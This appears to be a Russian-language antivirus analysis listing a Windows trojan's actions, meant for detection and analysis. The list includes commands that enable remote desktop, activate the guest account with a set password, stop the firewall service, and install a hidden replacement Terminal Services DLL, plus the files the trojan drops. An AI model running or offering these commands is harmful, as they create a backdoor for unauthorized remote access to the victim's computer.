Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TermService] 'Start' = '00000002'
- '%WINDIR%\dcxj\3389.exe'
- '<SYSTEM32>\svchost.exe' -k DComLaunch
- '<SYSTEM32>\net1.exe' start termservice
- '<SYSTEM32>\attrib.exe' +H +S +R <SYSTEM32>\termsrvhack.dll
- '<SYSTEM32>\shutdown.exe' -a
- '<SYSTEM32>\net1.exe' user guest /active:yes
- '<SYSTEM32>\net.exe' stop SharedAccess /y
- '<SYSTEM32>\net1.exe' stop SharedAccess /y
- '<SYSTEM32>\net1.exe' user guest cooldiyer
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s guest /add
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d <SYSTEM32>\termsrvhack.dll /f
- '<SYSTEM32>\net1.exe' stop sharedaccess
- '<SYSTEM32>\tasklist.exe' /svc
- '<SYSTEM32>\wscript.exe' "%WINDIR%\dcxj\1.vbs"
- '<SYSTEM32>\net.exe' stop sharedaccess
- '<SYSTEM32>\findstr.exe' /i "TermService" 111111.txt
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
- '<SYSTEM32>\ntsd.exe' -c q -p 840
- '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
- <SYSTEM32>\svchost.exe
- %WINDIR%\dcxj\222222.txt
- %WINDIR%\dcxj\111111.txt
- <SYSTEM32>\dllcache\termsrvhack.dll
- <SYSTEM32>\termsrvhack.dll
- %WINDIR%\dcxj\2.bat
- %WINDIR%\dcxj\termsrvhack.dll
- %WINDIR%\dcxj\3389.exe
- %WINDIR%\dcxj\1.vbs
- <SYSTEM32>\dllcache\termsrvhack.dll
- <SYSTEM32>\termsrvhack.dll
- %WINDIR%\dcxj\3389.exe
- %WINDIR%\dcxj\termsrvhack.dll
- %WINDIR%\dcxj\222222.txt
- %WINDIR%\dcxj\1.vbs
- %WINDIR%\dcxj\111111.txt
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''